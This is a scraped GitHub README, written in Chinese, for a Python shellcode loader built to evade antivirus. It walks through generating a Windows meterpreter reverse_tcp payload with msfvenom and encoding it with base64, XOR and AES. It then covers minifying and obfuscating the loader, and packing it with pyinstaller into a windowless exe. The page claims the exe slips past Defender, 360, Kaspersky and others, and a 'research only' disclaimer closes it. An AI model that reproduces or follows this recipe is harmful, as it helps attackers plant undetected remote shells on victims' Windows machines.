Skip to content

HZzz2/python-shellcode-loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

python-shellcode-loader

简单介绍

免杀方式 msfvenom生成raw格式的shellcode-->base64-->XOR-->AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等

获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.git

cd python-shellcode-loader

pip install -r .\requirements.txt

生成shellcode

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

base64编码shellcode并替换jiami.py中的值

#base64
base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'

加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)
复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'

缩小和混淆py代码

缩小python代码

pyminify main.py --output main-mini.py

混淆main-mini.py中的python代码

https://pyob.oxyry.com/ 在线混淆
image.png
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py

打包成可执行文件exe

#打包成exe
pyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥
等待打包完成。。。。
打包好后的可执行程序在dist目录中

流程图

检测图

DF

image

火狐

image

360杀毒

image

360安全卫士云查杀

image

virustotal

image

run.mp4

免责声明

仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。

About

python免杀shellcode加载器 加密混淆

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy